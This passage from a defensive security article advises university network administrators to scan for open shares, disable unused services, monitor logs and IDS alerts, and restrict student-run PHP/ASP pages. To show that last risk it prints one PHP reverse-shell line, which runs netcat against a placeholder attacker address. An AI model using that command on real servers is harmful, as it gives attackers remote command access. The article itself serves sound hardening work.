Now one of the students is poking around on the network to see what computers are out there and what shares they can get into.
They could just be curious, or they could be looking for other students that have shared out their MP3 and movie collections. They may just browse around using Network Neighborhood, or use an automated tool like Legion or SoftPerfect's NetScan to find all of the network shares available to them in a certain IP range. While looking around the student comes across a share called “Student Database”; two guesses what kind of information is in it. Scan your own network for open file shares before someone else does. Besides Legion and NetScan there’s also ShareEnum which can scan for shares by Domain/Workgroup or IP range and report what permissions different groups have to the shares.
Disabling unneeded services like Personal Web Server, SNMP, Simple TCP/IP Services and others can also go a long way to cutting down on potential exploits. Even a system that is behind on service packs and hot fixes can’t be exploited if the vulnerable services aren’t there to begin with.
Turn off anything that is not used and pay attention to what is being installed on the network.
Watch the web and security event logs. There are many times where I would not have noticed attackers on the network if it were not for looking in Event Viewer for failed login attempts.
Naturally logging must be turned on for this to work so open up MMC (Microsoft Management Console), add Security Configuration and Analysis, and setup logging of failed logins and access attempts. Better yet, set up a GPO (Group Policy Object) to automatically configure security auditing when a machine logs on to the network.
If an IDS (Intrusion Detection System) is running at the facility make sure someone is looking at the logs. An IDS like Snort is useless if no one actually looks at what is reported.
Most universities give students and staff the ability to create their own web pages on a campus web server. Sometimes the users can even create ASP or PHP files for their website to make them more dynamic.
With PHP installed and configured insecurely a user could run an arbitrary program in their web folder, for example Netcat, with a command like this:
$x = shell_exec("nc AttackingBoxIP 30 -e cmd ");
The previous command shovels a shell back to the attackers, allowing them command line access to the web server and from there they could leap frog to other machines and have their identity obscured as that of the web server. Active Server Pages have similar functionality (Wscript.shell).
Reading our newsletter every Monday will keep you up-to-date with security news.
Receive a daily digest of the latest security news.